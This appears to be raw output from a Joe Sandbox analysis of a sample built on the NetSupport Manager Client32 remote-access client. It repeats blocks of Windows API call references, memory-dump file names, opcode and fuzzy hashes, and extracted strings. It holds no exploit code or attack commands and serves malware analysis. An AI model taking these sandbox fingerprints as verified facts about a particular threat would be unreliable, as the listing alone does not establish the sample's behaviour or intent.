                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_
                                                                                        • String ID:
                                                                                        • API String ID: 3382485803-0
                                                                                        • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                        • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                        • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                        • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                        • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken
                                                                                        • String ID:
                                                                                        • API String ID: 4114910276-0
                                                                                        • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                        • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                        • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                        • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                          • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 328603210-0
                                                                                        • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                        • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __waccess_s
                                                                                        • String ID:
                                                                                        • API String ID: 4272103461-0
                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3646066109-0
                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                        APIs
                                                                                        • _NSMClient32@8.PCICL32(?,?,?,00F010A2,00000000), ref: 00F0100B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4131565154.0000000000F01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F00000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4131549170.0000000000F00000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_f00000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Client32@8
                                                                                        • String ID:
                                                                                        • API String ID: 433899448-0
                                                                                        • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction ID: c9e434760e1d31b5fb472ae86b3b4a4d965354d8358527ab853451bce9d527e3
                                                                                        • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction Fuzzy Hash: 91B092B221434D9BC714EF98EC41C7B739CBA98700B400909BD4543282CA65FC60E671
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • wsprintfA.USER32 ref: 110EB1B8
                                                                                        • GetTickCount.KERNEL32 ref: 110EB212
                                                                                        • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                        • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                        • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                        • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                        • API String ID: 3451743168-2289091950
                                                                                        • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                        • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                        • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                        • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 1110612E
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                        • GetTickCount.KERNEL32 ref: 1110613D
                                                                                        • GetTickCount.KERNEL32 ref: 11106190
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                        • GetTickCount.KERNEL32 ref: 111061CA
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                        • API String ID: 1574099134-3013461081
                                                                                        • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                        • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                        • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                        • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                        APIs
                                                                                          • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                          • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                          • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                        • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                        • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                        • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                        • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                        • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                        • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                        • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                        • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                        • String ID: AddToJournal$Chat
                                                                                        • API String ID: 693070851-2976406578
                                                                                        • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                        • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                        • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                        • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                        APIs
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                        • API String ID: 3960414890-2201682149
                                                                                        • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                        • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                        • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                        • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                        APIs
                                                                                        • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                        • _strncat.LIBCMT ref: 1102518B
                                                                                        • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                        • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                        • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                        • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                        • SetFocus.USER32(?), ref: 11025265
                                                                                          • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3832070631-0
                                                                                        • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                        • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                        • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                        • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000), ref: 110021A4
                                                                                        • SetCursor.USER32(00000000), ref: 110021AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID: RF>$RW>$Rh>$Ry>
                                                                                        • API String ID: 1675784387-4149278736
                                                                                        • Opcode ID: ccc6a066fdd1516699309e20ca3577cdd6dbae39598298960067ff8a39208018
                                                                                        • Instruction ID: 86d1e62847d0437b4ac10ca901b2b65aff75ed6ab5d8aec964a8a63e5e98fc0c
                                                                                        • Opcode Fuzzy Hash: ccc6a066fdd1516699309e20ca3577cdd6dbae39598298960067ff8a39208018
                                                                                        • Instruction Fuzzy Hash: 5E112BBDD0C1E6A7F304C6258CA6F7A326C8BD53C5F408832F945C9284C97DE800B234
                                                                                        APIs
                                                                                        • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                        • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                        • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
